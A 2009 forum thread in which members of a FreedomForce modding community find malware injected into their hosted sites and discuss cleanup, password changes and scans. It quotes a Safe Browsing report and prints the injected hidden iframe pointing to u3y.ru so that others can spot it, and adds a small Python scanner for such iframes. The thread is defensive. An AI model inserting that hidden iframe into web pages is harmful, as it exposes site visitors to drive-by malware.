I was just looking through HF's directory and noticed a few pages had been updated without my knowledge. Turns out FreedomForceForever may have been targeted with malware. I've gone in, replaced the malware files and made all the html files read-only, but all the other sites hosted on FFF should probably check their last modified date.
Quote
Safe Browsing
Diagnostic page for u3y.ru
What is the current listing status for u3y.ru?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-07-14, and the last time suspicious content was found on this site was on 2009-07-14.
Malicious software includes 3 trojan(s), 3 exploit(s).
This site was hosted on 8 network(s) including AS8560 (SCHLUND), AS12301 (INVITEL), AS8972 (PLUSSERVER).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, u3y.ru appeared to function as an intermediary for the infection of 3 site(s) including wcpas.com/, holm-sorensen.com/, icicijobs.in/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 8 domain(s), including wcpas.com/, holm-sorensen.com/, icicijobs.in/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
FreedomForceForever.com is ok to visit again! Yah!
PS - The malware is attached to the index.html btw.
To identify the malware code find this line of code -
<iframe src="http://u3y.ru:8080/index.php" width=148 height=149 style="visibility: hidden"></iframe>
DO NOT CLICK THE LINK IN THIS LINE OF CODE IT IS FOR IDENTIFYING PURPOSES ONLY!
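Added example, not part of the original posts: a scan over a local copy of a hosted site for the kind of hidden, off-site iframe shown above, reporting each affected file with its last-modified date. The host `injected.example`, the function names and the sample pages are constructed for illustration, and `own_hosts` is an assumed allow-list of the site's own hostnames.

```python
import os, tempfile, time
from html.parser import HTMLParser
from urllib.parse import urlparse

class HiddenIframeFinder(HTMLParser):
    """Collects the src of iframes that are hidden AND point off-site."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts, self.hits = own_hosts, []
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = urlparse(a.get("src", "")).hostname  # None for relative URLs
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if hidden and host and host not in self.own_hosts:
            self.hits.append(a["src"])

def scan(root, own_hosts):
    """Return (path, last-modified date, iframe src) per suspicious page."""
    findings = []
    for folder, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".html", ".htm")):
                continue
            path = os.path.join(folder, name)
            finder = HiddenIframeFinder(own_hosts)
            with open(path, encoding="utf-8", errors="replace") as fh:
                finder.feed(fh.read())
            mtime = time.strftime("%Y-%m-%d", time.localtime(os.path.getmtime(path)))
            findings += [(path, mtime, src) for src in finder.hits]
    return findings

def demo():
    # Constructed sample pages; injected.example is a placeholder host.
    pages = {
        "clean/index.html": '<p>hi</p><iframe src="/news.html"></iframe>',
        "hit/index.html": '<p>hi</p><iframe src="http://injected.example:8080/index.php"'
                          ' width=148 height=149 style="visibility: hidden"></iframe>',
    }
    root = tempfile.mkdtemp()
    for rel, html in pages.items():
        os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(html)
    return scan(root, own_hosts={"freedomforceforever.com"})

if __name__ == "__main__":
    print(demo())
```

A last-modified date on a day nobody uploaded anything is the second signal to compare against the scan output.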
Just checked my index and I'm pretty sure that I'm "clean".
Quote from: tommyboy on July 14, 2009, 03:06:12 PM
Just checked my index and I'm pretty sure that I'm "clean".
You are.
I wonder what caused this, has anyone told cat
Quote from: the_ultimate_evil on July 14, 2009, 04:16:11 PM
I wonder what caused this, has anyone told cat
The Google message says third parties add malicious code to legitimate sites. So I can only assume a malware bot added it after getting in somehow.
I double checked all my files on my computer and none of them had the code and the ftp client shows it was edited in the heroforce folder on a day I didn't update anything (July 13, 2009).
As soon as I noticed it I posted it here to protect everyone.
hmm i'm 99.9% sure i wasn't in the server yesterday, but i'll run spybot etc just to be sure
Is it odd that my first reaction to your post was not "Heroforce had Malware? I'd better run a scan because I've opened it recently!" but "ZOMG, update!!!! YAY!"
AA, to avoid accidents, I changed the link in the first post so that it's not clickable. (Some browsers pre-load parts of links on pages to make loading faster.)
BTW, I did a quick search for u3y.ru on freedomforceforever.com and didn't come up with any hits.
Quote from: Tomato on July 14, 2009, 05:00:09 PM
Is it odd that my first reaction to your post was not "Heroforce had Malware? I'd better run a scan because I've opened it recently!" but "ZOMG, update!!!! YAY!"
That is pretty bad. :P Maybe we should update or something...
Quote from: stumpy on July 14, 2009, 05:03:39 PM
AA, to avoid accidents, I changed the link in the first post so that it's not clickable. (Some browsers pre-load parts of links on pages to make loading faster.)
BTW, I did a quick search for u3y.ru on freedomforceforever.com and didn't come up with any hits.
Good. Maybe it was an isolated incident but I did notice some unusual traffic from Russia to the site in the last week.
woo scary.
just did a scan with spybot and superantispyware got nothing
I think all of these hacks & other attacks we've been seeing are all being directed by Nuclear Winter. He didn't like that he was portrayed as a "villain", and his collection of teddy bears was completely glossed over. :P
This is a very busy week for me. I'm supposed to be somewhere right now and will be heading out in a minute, but when I get the time, I'll start sifting through web pages to see if it crawled into anything else. That won't be until Saturday at the earliest. If anyone feels like doing this for me, preferably someone already being hosted, I can give you full site access. Otherwise, it will have to wait for now.
You all may want to stay away from hosted sites that haven't been confirmed as clean (so far tommyboy's site and Hero Force.)
I don't know where to ask this so I'll ask it here, why does the hero force site say "Sorry, Were Closed"? Was it hacked/attacked again?
Quote from: GGiant on July 20, 2009, 06:48:47 PM
I don't know where to ask this so I'll ask it here, why does the hero force site say "Sorry, Were Closed"? Was it hacked/attacked again?
Yeah we are still experiencing some malware errors so in order to protect the community we are closing for the indefinite future. Don't worry my newest work will probably be available on my blog in the coming weeks.
Sorry about all this guys. I guess I need to start checking the other sites, although I have a feeling it isn't widespread.
On a better note, I was just informed that they are changing my plan to give me unlimited bandwidth and more storage space for just $1 more per month.
Quote from: catwhowalksbyhimself on July 20, 2009, 08:55:44 PM
Sorry about all this guys. I guess I need to start checking the other sites, although I have a feeling it isn't widespread.
On a better note, I was just informed that they are changing my plan to give me unlimited bandwidth and more storage space for just $1 more per month.
It's ok. This is probably for the best for all of HeroForce right now. We have so much stuff going on and I don't think any of us were expecting to update any time soon. As for the bandwidth, awesome!
YOU WILL BE ASSIMILATED!
Resistance is futile. All are Champions, Champions are all.
I guess I'll have to wait then, :thumbup: for unlimited bandwidth and more storage space.
Champions? Bah, just because Murs did the actual site attacking does not give you conquering rights. WE'RE the ones who had to buy the sweets to con him into actually doing it.
mmmmmmm pop tarts
*nom nom nom nom*
Dammit Murs...we can't take you anywhere! :angry: :P :lol:
Please note that if you are currently getting hosting with me and are on the fourth group, your password has now been changed. Contact me and I'll give you the new one.
Alright, I think I've tracked this thing down.
I think someone in group 4 has had his information stolen, either by being hacked, or perhaps by a friend who should not be given that title. Likely the former. The password has been changed, so that should stop that. However, one other site in group 4 was affected, namely http://thedod.freedomforceforever.com/
It is recommended that you not go to this site until it is cleaned up.
All other sub-sites, however are safe.
In addition, Google has hero force listed as an attack site. I do hope it wasn't one of you who reported it, because Google says it was only reported once. In any case, when the site is reopened, you will be able to safely ignore any warnings about it being an attack site.
how would you know if you've been hacked, i've checked with avg and 5 different spyware applications, and got a clean bill
That's all you can do really.
My provider recommends wiping out the hard drive and starting over, but I don't recommend that for now.
You'd also want a good firewall. If you don't have one, then that might be the problem, but I'm assuming that you do.
Actually, it could be any of those with access to group 4 that are affected. I've only given the new password to AA and Lunarman so far, though, so that should help narrow things down.
honestly i'm 99.9999% sure it's not me, but it's kinda worrying overall with this situation
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
Quote from: catwhowalksbyhimself on July 26, 2009, 10:43:07 PM
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
I've just gone in again and cleaned up the code. I also contacted Google to review the site again.
I'll run some scans tonight when I get home to my computer.
Hopefully we're at the end of this mess.
Quote from: catwhowalksbyhimself on July 26, 2009, 10:43:07 PM
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
the question is how did they get the password, i'm running vista, avg and spybot along with no script, adblock plus and web of trust. so i hope that it wasn't me. though when the first attack happened i hadn't accessed HF in a long long time
Quote from: the_ultimate_evil on July 26, 2009, 11:28:23 PM
Quote from: catwhowalksbyhimself on July 26, 2009, 10:43:07 PM
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
the question is how did they get the password, i'm running vista, avg and spybot along with no script, adblock plus and web of trust. so i hope that it wasn't me. though when the first attack happened i hadn't accessed HF in a long long time
I'm on vista as well with clamwin, spybot, and Malwarebytes (I recommend this to everyone).
Quote
the question is how did they get the password
There are currently half a dozen sites using that login. It could conceivably be any of them. Many haven't been active in a while, and therefore would be unlikely to notice.